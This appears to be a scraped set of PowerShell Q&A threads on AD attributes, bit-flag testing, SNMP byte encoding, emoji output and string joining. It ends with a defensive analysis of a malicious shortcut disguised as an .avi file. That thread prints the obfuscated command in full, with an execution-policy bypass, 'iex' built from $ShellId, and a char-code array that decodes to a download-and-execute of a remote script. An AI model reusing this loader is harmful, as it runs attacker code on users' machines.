Cannot add the msExchArchiveGUID in Powershell - powershell

I cannot add the GUID value for msExchArchiveGUID in powershell. Error reports of "constraint violation" or "A value for the attribute was not in the acceptable range of values" depending on which powershell cmdlet is used. From what I can tell the value that needs to be input needs to be up to 16 characters. Anything more and it errors. For example, the GUID value I need to write is 5C669E441173CF4394995E43EC8ED9ED. When pasted using ADSIEdit the output looks like: 5C 66 9E 44 11 73 CF 43 94 99 5E 43 EC 8E D9 ED. If I add the same value using Powershell it errors. How can I write the value in Powershell to give the same result like adding using ADSIEdit?
E.g
Set-aduser -identity "someone" -add #{msExchArchiveGUID="A format the works!
"}


The solution is a bit convoluted (and probably obvious to all but me!) which I will show below.. I'm sure a more concise answer is out there..
I get the GUID value using quest (rather that get-remotemailbox)
Get-QADUser -Service domain -Identity someone -IncludeAllProperties|select msExchArchiveGUID
This presents the archive GUID as 5C669E441173CF4394995E43EC8ED9ED
So.....
$oct = "5C669E441173CF4394995E43EC8ED9ED"
$oct1 = $oct.substring(0,2)
$oct2 = $oct.substring(2,2)
$oct3 = $oct.substring(4,2)
$oct4 = $oct.substring(6,2)
$oct5 = $oct.substring(8,2)
$oct6 = $oct.substring(10,2)
$oct7 = $oct.substring(12,2)
$oct8 = $oct.substring(14,2)
$oct9 = $oct.substring(16,4)
$oct10 = $oct.substring(20,12)
$strOut = "$oct4" + "$oct3" + "$oct2" + "$oct1" + "-" + "$oct6" + "$oct5" + "-" + "$oct8" + "$oct7" + "-" + "$oct9" + "-" + "$oct10"
Output is "449E665C-7311-43CF-9499-5E43EC8ED9ED"
$Id = [GUID]("449e665c-7311-43cf-9499-5e43ec8ed9ed")
Set-ADUser -Identity $IPGUser -Clear msexcharchiveGUID
Set-ADUser User -Add #{msexchArchiveGUId=$id}

Related

Powershell Hex, Int and Bit flag checking

I am trying to process a flag from the MECM command Get-CMTaskSequenceDeployment called 'AdvertFlags'.
The information from Microsoft in relation to this value is HERE
The value returned is designated as : Data type: UInt32
In the table of flags, the one I need to check is listed as :
Hexadecimal (Bit)
Description
0x00000020 (5)
IMMEDIATE. Announce the advertisement to the user immediately.
As part of my Powershell script I am trying to ascertain if this flag is set.
I can see by converting it to Binary that a particular bit gets set.
When the settings is enabled:
DRIVE:\> [convert]::ToString((Get-CMTaskSequenceDeployment -AdvertisementID ABC20723).AdvertFlags, 2)
100110010000000000100000
When the setting is disabled:
DRIVE:\> [convert]::ToString((Get-CMTaskSequenceDeployment -AdvertisementID ABC20723).AdvertFlags, 2)
100110010000000000000000
The 6th bit is changed. Great! So far though, I've been unable to find a way to check if this bit is set. I suspected something in the bitwise operators (-band -bor etc) would help me here but I've been unable to get it to work.
Any bitwise operation I try returns an error:
"System.UInt64". Error: "Value was either too large or too small for a UInt64."
I mean, I can compare the string literally, but other options may be changed at any point.
Any help greatly appreciated.
EDIT: Just as an example of the error I am seeing, I can see that the bit that is set is '32' and from my limited understanding I should be able to:
PS:\> '100110010000000000100000' -band '32'
Cannot convert value "100110010000000000100000" to type "System.UInt64". Error: "Value was either too large or too small for a UInt64."
At line:1 char:1
+ '100110010000000000100000' -band '32'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvalidCastIConvertible
But I just always return an error

To test bit6 in
$AdvertFlags = (Get-CMTaskSequenceDeployment -AdvertisementID ABC20723).AdvertFlags
Should simply be:
if ($AdvertFlags -band 32) { 'bit6 is set' } else { 'bit6 is not set' }
I do not have access to a deployment environment with Get-CMTaskSequenceDeployment cmdlet, nevertheless to confirm what I am stating:
$AdvertFlags = [Convert]::ToUInt32("100110010000000000100000", 2)
$AdvertFlags
10027040
if ($AdvertFlags -band 32) { 'bit6 is set' } else { 'bit6 is not set' }
bit6 is set
$AdvertFlags = [Convert]::ToUInt32("100110010000000000000000", 2)
$AdvertFlags
10027008
if ($AdvertFlags -band 32) { 'bit6 is set' } else { 'bit6 is not set' }
bit6 is not set
Your self-answer using [bigint]'100110010000000000100000' -band "32" to test for bit6 is merely a coincident that it returns the expected value:
10027035..10027045 |ForEach-Object {
$Binary = [convert]::ToString($_, 2)
[pscustomobject]#{
Binary = $Binary
bAnd = $_ -bAnd 32
Bigint = [bigint]$Binary -band "32"
}
}
Yields:
Binary bAnd Bigint
------ ---- ------
100110010000000000011011 0 0
100110010000000000011100 0 0
100110010000000000011101 0 0
100110010000000000011110 0 32 # ← incorrect
100110010000000000011111 0 32 # ← incorrect
100110010000000000100000 32 32
100110010000000000100001 32 32
100110010000000000100010 32 32
100110010000000000100011 32 32
100110010000000000100100 32 0 # ← incorrect
100110010000000000100101 32 0 # ← incorrect
enumerations as flags
But PowerShell has an even nicer way to test them by name:
[Flags()] enum AdvertFlags {
IMMEDIATE = 0x00000020 # Announce the advertisement to the user immediately.
ONSYSTEMSTARTUP = 0x00000100 # Announce the advertisement to the user on system startup.
ONUSERLOGON = 0x00000200 # Announce the advertisement to the user on logon.
ONUSERLOGOFF = 0x00000400 # Announce the advertisement to the user on logoff.
OPTIONALPREDOWNLOAD = 0x00001000 # If the selected architecture and language matches that of the client, the package content will be downloaded in advance
WINDOWS_CE = 0x00008000 # The advertisement is for a device client.
ENABLE_PEER_CACHING = 0x00010000 # This information applies to System Center 2012 Configuration Manager SP1 or later, and System Center 2012 R2 Configuration Manager or later.
DONOT_FALLBACK = 0x00020000 # Do not fall back to unprotected distribution points.
ENABLE_TS_FROM_CD_AND_PXE = 0x00040000 # The task sequence is available to removable media and the pre-boot execution environment (PXE) service point.
APTSINTRANETONLY = 0x00080000 #
OVERRIDE_SERVICE_WINDOWS = 0x00100000 # Override maintenance windows in announcing the advertisement to the user.
REBOOT_OUTSIDE_OF_SERVICE_WINDOWS = 0x00200000 # Reboot outside of maintenance windows.
WAKE_ON_LAN_ENABLED = 0x00400000 # Announce the advertisement to the user with Wake On LAN enabled.
SHOW_PROGRESS = 0x00800000 # Announce the advertisement to the user showing task sequence progress.
NO_DISPLAY = 0x02000000 # The user should not run programs independently of the assignment.
ONSLOWNET = 0x04000000 # Assignments are mandatory over a slow network connection.
TARGETTOWINPE = 0x10000000 # Target this deployment to WinPE only.
HIDDENINWINPE = 0x20000000 # Target this deployment to WinPE only but hide in WinPE. It can only be used by TS variable SMSTSPreferredAdvertID.
}
# $AdvertFlags = [AdvertFlags](Get-CMTaskSequenceDeployment -AdvertisementID ABC20723).AdvertFlags
$AdvertFlags = [AdvertFlags][Convert]::ToUInt32("100110010000000000100000", 2)
# or: $AdvertFlags = [AdvertFlags]('IMMEDIATE', 'ENABLE_PEER_CACHING', 'APTSINTRANETONLY', 'OVERRIDE_SERVICE_WINDOWS', 'SHOW_PROGRESS')
$AdvertFlags
IMMEDIATE, ENABLE_PEER_CACHING, APTSINTRANETONLY, OVERRIDE_SERVICE_WINDOWS, SHOW_PROGRESS
$AdvertFlags -bAnd [AdvertFlags]'IMMEDIATE'
IMMEDIATE

EDIT: My answer here is incorrect as noted above. Leaving here for prosperity!
As always I BELEIVE I found the answer minutes after posting (After spending a couple hours on this!).
By adjusting the type to [bigint] the comparison was able to complete and return the expected answer:
DRIVE:\> [bigint]'100110010000000000100000' -band "32"
32
So a simple:
If (([bigint]'100110010000000000100000' -band "32") -gt 0){$true}else{$false}
True
and:
If (([bigint]'100110010000000000000000' -band "32") -gt 0){$true}else{$false}
False
Solves my issue. Feel free to give any extra advice if this is not the ideal way to proceed.
I though PS would be smarted when auto defining types etc. This is targeting PS5 on Server 2012 R2 though.

Powershell SNMP converting IP Address: Getting wrong value

How do I properly convert an IP Address gotten via OleSNMP to a useable value?
I'm trying to write a Powershell script to query devices with SNMP and then display the data. Stuff works fine for simple types, but I'm having problems with the IP Addresses (and MAC addresses, but let's stick to IP for now)
Here's what I have (simplified to the problem space):
param ($ipaddr='10.1.128.114', $community='Public')
$snmp = New-Object -ComObject oleprn.OleSNMP
$snmp.open($ipaddr, $community)
$result = $snmp.get(".1.3.6.1.2.1.4.20.1.1.10.1.128.114")
$enc = [system.Text.Encoding]::ASCII
$bytes = $enc.GetBytes($result)
write-host( "bytes:" + $bytes)
Which outputs:
bytes:10 1 63 114
When I expected
bytes:10 1 128 114
For contrast, the snmp-get outputs:
$ snmpget 10.1.128.114 -c Public -v2c -On .1.3.6.1.2.1.4.20.1.1.10.1.128.114
.1.3.6.1.2.1.4.20.1.1.10.1.128.114 = IpAddress: 10.1.128.114
And yes, I realize that in my final script I'll have to walk the table instead of using a direct "get" but I need to fix my parsing first.

As mentioned in the comments, the ASCII encoding substitutes characters outside its valid range with a question mark ?, which is ASCII character 63.
More info is available in the documentation for ASCIIEncoding.GetBytes - search for "?" and you'll find this:
ASCIIEncoding does not provide error detection. Any Unicode character greater than U+007F is encoded as the ASCII question mark ("?").
Note, 0x7F is 127, so since [char] 128 is outside this range, it's being converted to the byte equivalent of ? (which is 63) when you call GetBytes.
Your code is basically doing this this:
$result = ([char] 10) + ([char] 1) + ([char] 128) + ([char] 114)
$encoding = [System.Text.Encoding]::ASCII
$bytes = $encoding.GetBytes($result)
$bytes
# 10
# 1
# 63 (i.e. "?")
# 114
You need to use an encoder which will convert characters higher than 0x7F into the equivalent bytes - something like iso-8859-1 seems to work:
$result = ([char] 10) + ([char] 1) + ([char] 128) + ([char] 114)
$encoding = [System.Text.Encoding]::GetEncoding("iso-8859-1")
$bytes = $encoding.GetBytes($result)
$bytes
# 10
# 1
# 128
# 114

Odd school assignment, about displaying emojis in powershell

I've had the pleasure to get the assignment of posting emojis in Powershell, the only problem is they have to be on the same line, and there are three. This is, my first assignment, and we have no prior teaching in this subject so after googling and searching YouTube, my best shot was this below, however, it came with some error saying something about either too high value, or too low value.
Full error text: Exception calling "ToInt32" with "2" argument (s): "The value was either too large or too small to a UInt32. "
At C: \ Users \ EG \ Downloads \ Herningsholm \ Powershell H1 \ Hardware Information.ps1: 3 char: 5
$ UnicodeInt = [System.Convert] :: toInt32 ($ StrippedUnicode, 16)
CategoryInfo: NotSpecified: (:) [], MethodInvocationException
FullyQualifiedErrorId: OverflowException
$FullUnicode = ('U+1F60E') + ('U+1F436') + ('U+1F642')
$StrippedUnicode = $FullUnicode -replace 'U\+',''
$UnicodeInt = [System.Convert]::toInt32($StrippedUnicode,16)
[System.Char]::ConvertFromUtf32($UnicodeInt)

Try this out:
Full emoji list > here
# saves unicode for each emoji https://unicode.org/emoji/charts/full-emoji-list.html
$FullUnicode0 = 'U+1F606'
$FullUnicode1 = 'U+1F605'
$FullUnicode2 = 'U+1F605'
# removes the U+ bit
$StrippedUnicode0 = $FullUnicode0 -replace 'U\+',''
$StrippedUnicode1 = $FullUnicode1 -replace 'U\+',''
$StrippedUnicode2 = $FullUnicode2 -replace 'U\+',''
# Converts the value of the specified object to a 32-bit signed integer
$UnicodeInt0 = [System.Convert]::toInt32($StrippedUnicode0,16)
$UnicodeInt1 = [System.Convert]::toInt32($StrippedUnicode1,16)
$UnicodeInt2 = [System.Convert]::toInt32($StrippedUnicode2,16)
# Converts the specified Unicode code point into a UTF-16 encoded string so that you have an emoji
$Emoji0 = [System.Char]::ConvertFromUtf32($UnicodeInt0)
$Emoji1 = [System.Char]::ConvertFromUtf32($UnicodeInt1)
$Emoji2 = [System.Char]::ConvertFromUtf32($UnicodeInt2)
write-host "$($Emoji0), $($Emoji1), $($Emoji2)"

How to add a new line after every integer

I am trying to figure out a way to make a new variable from another to output to a GUI. When I try to just display the variable through a lable it loses its line breaks.
I managed to figure out a solution when working with text but when it comes to numbers it does not work.
Here is what I have tried:
$ActiveUnits = #(Get-MsolAccountSku | Select-Object -ExpandProperty ActiveUnits)
$ActiveUnitsFix = "`n"
foreach ($Unit in $ActiveUnits) {
$ActiveUnitsFix += #($Unit + "`n")
}
The output that I am getting is this:
31425220100002521100001000000100000002137328420
When it should be something like this:
3
14
25
220
10000
25
21
10000
1000000
10000000
213
7
3
28
4
20

You could use the -join parameter for adding the new line if you receive an int array from (Get-MsolAccountSku).ActiveUnits.
[System.Int32[]]$ActiveUnits = (Get-MsolAccountSku).ActiveUnits
[System.String]$ActiveUnitsFix = $ActiveUnits -join [System.Environment]::NewLine
$ActiveUnitsFix

Malware Using .Lnk file to Powershell

I downloaded a file which I almost didn't think twice over, but the target (of the shortcut) caught my eye:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
There's no doubt that something fishy is going on here. I understand the first three parameters, but what I couldn't quite figure out is how code of a payload like this would work in just a basic shortcut?

My guess, it runs a Powershell with
NoProfile
WindowStyle 1 = Minimized
ExecutionPolicy ByPass = Nothing is blocked and there are no warnings or prompts
then dot-sources the remaining code
Let's split this code up:
( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]
$ShellId is a built-in Powershell variable:
>$ShellId
Microsoft.PowerShell
So ( $shelliD[1]+$SHeLlID[13]+'x') transforms to iex (= Invoke-Expression)
The rest of the code is ([StrIng]::jOin( '',[CHar[]](36 ,97,115, 112 , 120,32 ,61,[omitting rest of code]. I gues the char array contains ascii characters. If so, we can transform it to:
$aspx =
Summary:
powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy ByPass . iex "$aspx = ...."
So it invokes the code starting with $aspx = in a minimized Powershell window without warnings or prompts.
Maybe the code ran through one of these obfuscation methods.
Hope that helps.

I got the same. The file looked like a AVI and I opened it quickly to check the quality of the movie. It was actually a well-disguised shortcut:
PS C:\Users\pharg\Downloads\tv> $sh = New-Object -COM WScript.Shell
PS C:\Users\pharg\Downloads\tv> $target = $sh.CreateShortcut('C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p
.XviD.AC3-EcHO.avi.lnk')
PS C:\Users\pharg\Downloads\tv> $target
FullName : C:\Users\pharg\Downloads\tv\A Simple Favor 2018.DVDRip720p.XviD.AC3-EcHO.avi.lnk
Arguments : -NoPr -WINd 1 -eXEc ByP . ( $shelliD[1]+$SHeLlID[13]+'x') ([StrIng]::jOin( '',[CHar[]](36 ,97,115,
112 , 120,32 ,61,32 ,40 ,40, 78, 101 , 119, 45,79 , 98, 106,101,99, 116 , 32 ,83, 121 , 115,116,
101 ,109,46 ,78 , 101, 116, 46,87 ,101,98 , 67 ,108,105,101,110 ,116,41, 41 , 46, 68,
111,119,110,108, 111 , 97 , 100, 83,116, 114 ,105 ,110,103,40, 39 , 104, 116 ,116,112 ,58,47, 47
,122, 118 , 98 ,46,117, 115 ,47,49 ,39 ,41, 59 ,73 , 69 , 88, 32 ,36, 97, 115 ,112 , 120 ) ) )
Description : .avi
Hotkey :
IconLocation : C:\WINDOWS\System32\imageres.dll,18
RelativePath :
TargetPath : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WindowStyle : 7
WorkingDirectory : %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
The target here translates to:
$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
I opened http://zvb.us/1 and it seems I have had some code run on my PC. At this point, I am not sure what has happened. No symptoms...